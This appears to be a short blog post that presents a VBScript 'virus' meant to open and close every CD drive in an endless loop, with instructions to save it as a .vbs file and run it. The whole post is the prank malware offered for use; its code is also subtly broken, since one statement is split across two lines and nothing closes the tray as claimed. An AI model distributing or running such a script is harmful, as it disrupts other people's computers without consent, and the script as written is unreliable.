Here is the simple virus that open and close CD Drive continuousely just write down folowing code into text editor like Notepad and save as anyname.vbs
set wmp=createObject("wmplayer.ocx.7")
set drives=wmp.
cdromCollection
sub open_saysame()
on error resume next
do
if drives.count>=1 then
for i=0 to drives.count-1
drives.item(i).eject()
next
end if
loop end sub
open_saysame()
0 comments:
Post a Comment